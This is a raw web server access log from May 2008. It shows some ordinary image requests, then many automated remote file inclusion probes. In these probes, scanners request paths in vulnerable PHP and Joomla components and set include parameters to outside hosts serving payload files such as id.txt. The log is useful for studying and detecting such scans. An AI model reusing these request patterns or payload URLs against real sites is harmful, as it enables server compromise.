75.173.131.16 - - [02/May/2008:10:45:55 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4364M.JPG HTTP/1.1" 200 94330 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
75.173.131.16 - - [02/May/2008:10:45:55 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4365M.JPG HTTP/1.1" 200 105802 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
75.173.131.16 - - [02/May/2008:10:45:55 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4366M.JPG HTTP/1.1" 200 86979 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
75.173.131.16 - - [02/May/2008:10:45:56 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4367M.JPG HTTP/1.1" 200 83489 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
75.173.131.16 - - [02/May/2008:10:45:57 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4369M.JPG HTTP/1.1" 200 102059 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
75.173.131.16 - - [02/May/2008:10:45:58 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4374M.JPG HTTP/1.1" 200 114637 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
75.173.131.16 - - [02/May/2008:10:45:58 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4375M.JPG HTTP/1.1" 200 85908 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
75.173.131.16 - - [02/May/2008:10:45:58 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4376M.JPG HTTP/1.1" 200 78015 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
75.173.131.16 - - [02/May/2008:10:46:00 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4377M.JPG HTTP/1.1" 200 87820 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
75.173.131.16 - - [02/May/2008:10:46:00 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4378M.JPG HTTP/1.1" 200 87412 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
75.173.131.16 - - [02/May/2008:10:46:00 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4379M.JPG HTTP/1.1" 200 84804 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
75.173.131.16 - - [02/May/2008:10:46:02 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4380M.JPG HTTP/1.1" 200 83650 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
75.173.131.16 - - [02/May/2008:10:46:02 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4381M.JPG HTTP/1.1" 200 98779 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
75.173.131.16 - - [02/May/2008:10:46:02 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4382M.JPG HTTP/1.1" 200 88270 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
75.173.131.16 - - [02/May/2008:10:46:04 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4383M.JPG HTTP/1.1" 200 88967 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
75.173.131.16 - - [02/May/2008:10:46:04 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4384M.JPG HTTP/1.1" 200 96561 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
75.173.131.16 - - [02/May/2008:10:46:04 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4385M.JPG HTTP/1.1" 200 94524 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
75.173.131.16 - - [02/May/2008:10:46:06 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4386M.JPG HTTP/1.1" 200 70821 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
75.173.131.16 - - [02/May/2008:10:46:06 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4387M.JPG HTTP/1.1" 200 63059 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
75.173.131.16 - - [02/May/2008:10:46:08 -0700] "GET /bikes/dteel/2008_02_07/IMG_4447s.JPG HTTP/1.1" 200 335611 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
75.173.131.16 - - [02/May/2008:10:46:09 -0700] "GET /bikes/dteel/2008_02_07/IMG_4452s.JPG HTTP/1.1" 200 243937 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
75.173.131.16 - - [02/May/2008:10:46:09 -0700] "GET /bikes/dteel/2008_02_07/IMG_4451s.JPG HTTP/1.1" 200 291037 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:10:46:23 -0700] "GET /logs/solpot.html?body=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:10:46:24 -0700] "GET /solpot.html?body=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.113.4.81 - - [02/May/2008:10:46:37 -0700] "GET /logs/access_071201.log/port.php?content=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [02/May/2008:10:46:37 -0700] "GET /port.php?content=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [02/May/2008:10:46:38 -0700] "GET /logs/port.php?content=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.53.197.2 - - [02/May/2008:10:46:38 -0700] "GET /logs/access_080215.log//modules/vwar/admin/admin.php?vwar_root=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:10:46:55 -0700] "GET /logs/access_071219.log//modules/vwar/admin/admin.php?vwar_root=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:10:47:22 -0700] "GET /logs/access_080312.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:10:47:52 -0700] "GET /logs/access_071224.log//modules/vwar/admin/admin.php?vwar_root=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:10:47:57 -0700] "GET /logs/access_080215.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:10:47:57 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:10:47:57 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:10:48:03 -0700] "GET /logs/access_080324.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:10:48:03 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:10:48:04 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.113.4.81 - - [02/May/2008:10:48:06 -0700] "GET /logs/access_080207.log/port.php?content=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.12.151.34 - - [02/May/2008:10:48:16 -0700] "GET /logs/access_080115.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://jogador.fxplus.mail333.su/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
67.212.173.74 - - [02/May/2008:10:48:26 -0700] "GET /logs/index1.php?x=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [02/May/2008:10:48:27 -0700] "GET /index1.php?x=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.113.4.81 - - [02/May/2008:10:48:27 -0700] "GET /logs/access_080125.log//tools/send_reminders.php?includedir=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [02/May/2008:10:48:27 -0700] "GET //tools/send_reminders.php?includedir=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [02/May/2008:10:48:27 -0700] "GET /logs//tools/send_reminders.php?includedir=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [02/May/2008:10:48:29 -0700] "GET /logs/port.php?content=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.55.70.74 - - [02/May/2008:10:48:29 -0700] "GET /logs/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
140.113.4.81 - - [02/May/2008:10:48:29 -0700] "GET /port.php?content=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.55.70.74 - - [02/May/2008:10:48:29 -0700] "GET /administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
140.113.4.81 - - [02/May/2008:10:48:57 -0700] "GET /logs/access_080110.log//tools/send_reminders.php?includedir=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.227.99.192 - - [02/May/2008:10:49:04 -0700] "GET /logs/access_080211.log//modules/TotalCalendar/about.php?inc_dir=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.227.209.17 - - [02/May/2008:10:49:07 -0700] "GET /logs/access.log/modules/My_eGallery/public/displayCategory.php?basepath=http://www.olgunlar.com/mambots/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.227.99.192 - - [02/May/2008:10:49:09 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:10:49:12 -0700] "GET /logs/access_080312.log//admin/business_inc/saveserver.php?thisdir=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:10:49:13 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:10:49:13 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.99.192 - - [02/May/2008:10:49:15 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:10:49:19 -0700] "GET /logs/access_080312.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:10:49:19 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:10:49:19 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.99.192 - - [02/May/2008:10:49:20 -0700] "GET /logs/access_080117.log//modules/TotalCalendar/about.php?inc_dir=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:10:49:21 -0700] "GET /logs/access_071218.log//modules/vwar/admin/admin.php?vwar_root=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.245.149.155 - - [02/May/2008:10:49:22 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.245.149.155 - - [02/May/2008:10:49:22 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.245.149.155 - - [02/May/2008:10:49:22 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.245.149.155 - - [02/May/2008:10:49:22 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:10:49:30 -0700] "GET /logs/access_080306.log//admin/classes/TplLoad.php?full_path_to_public_program=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:10:49:30 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.248.81 - - [02/May/2008:10:49:30 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://areairc.t35.com/super/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:10:49:31 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:10:49:36 -0700] "GET /logs/access_080309.log//admin/business_inc/saveserver.php?thisdir=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.248.81 - - [02/May/2008:10:49:37 -0700] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://areairc.t35.com/super/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.44.248.81 - - [02/May/2008:10:49:49 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://areairc.t35.com/super/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.44.248.81 - - [02/May/2008:10:49:49 -0700] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://areairc.t35.com/super/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.227.209.17 - - [02/May/2008:10:51:08 -0700] "GET /logs/access_080201.log/modules/My_eGallery/public/displayCategory.php?basepath=http://www.olgunlar.com/mambots/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:10:51:17 -0700] "GET /logs/access_080222.log/solpot.html?body=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.227.99.192 - - [02/May/2008:10:51:36 -0700] "GET /logs/access_080211.log//modules/TotalCalendar/about.php?inc_dir=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:10:51:40 -0700] "GET /logs/access_080123.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.99.192 - - [02/May/2008:10:51:42 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:10:51:44 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://br0x.altervista.org/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:10:51:45 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:10:51:57 -0700] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.99.192 - - [02/May/2008:10:51:57 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:10:51:58 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:10:51:58 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.99.192 - - [02/May/2008:10:52:03 -0700] "GET /logs/access_080117.log//modules/TotalCalendar/about.php?inc_dir=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.113.4.81 - - [02/May/2008:10:52:06 -0700] "GET /logs//tools/send_reminders.php?includedir=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [02/May/2008:10:52:06 -0700] "GET //tools/send_reminders.php?includedir=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:10:52:45 -0700] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:10:52:46 -0700] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:10:52:49 -0700] "GET /logs/access_080306.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:10:52:53 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://br0x.altervista.org/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
137.204.107.138 - - [02/May/2008:10:52:54 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://br0x.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [02/May/2008:10:53:07 -0700] "GET /logs/access.log/index2.php?x=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [02/May/2008:10:53:08 -0700] "GET /index2.php?x=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [02/May/2008:10:53:08 -0700] "GET /logs/index2.php?x=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.55.70.74 - - [02/May/2008:10:53:12 -0700] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.55.70.74 - - [02/May/2008:10:53:12 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.92 - - [02/May/2008:10:53:45 -0700] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.92 - - [02/May/2008:10:53:45 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.92 - - [02/May/2008:10:53:45 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
67.212.173.74 - - [02/May/2008:10:54:01 -0700] "GET /logs/index1.php?pagina=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [02/May/2008:10:54:01 -0700] "GET /index1.php?pagina=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.3 - - [02/May/2008:10:54:28 -0700] "GET /logs/access_080201.log//claroline/tracking/userLog.php?rootSys=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.3 - - [02/May/2008:10:54:29 -0700] "GET //claroline/tracking/userLog.php?rootSys=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.3 - - [02/May/2008:10:54:29 -0700] "GET /logs//claroline/tracking/userLog.php?rootSys=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.3 - - [02/May/2008:10:54:41 -0700] "GET /logs/access_080201.log//claroline/phpbb/page_tail.php?includePath=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.3 - - [02/May/2008:10:54:41 -0700] "GET //claroline/phpbb/page_tail.php?includePath=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.3 - - [02/May/2008:10:54:42 -0700] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:10:55:19 -0700] "GET /logs//main.php?sayfa=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:10:55:19 -0700] "GET //main.php?sayfa=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.138.166 - - [02/May/2008:10:55:27 -0700] "GET /webcalendar//tools/send_reminders.php?noSet=0&includedir=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.74 - - [02/May/2008:10:56:29 -0700] "GET /logs/access_080201.log/index1.php?pagina=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [02/May/2008:10:56:29 -0700] "GET /index1.php?pagina=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [02/May/2008:10:56:29 -0700] "GET /logs/index1.php?pagina=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.99.192 - - [02/May/2008:10:56:39 -0700] "GET /logs/access_080120.log//skin/zero_vote/error.php?dir=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.99.192 - - [02/May/2008:10:56:55 -0700] "GET //skin/zero_vote/error.php?dir=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
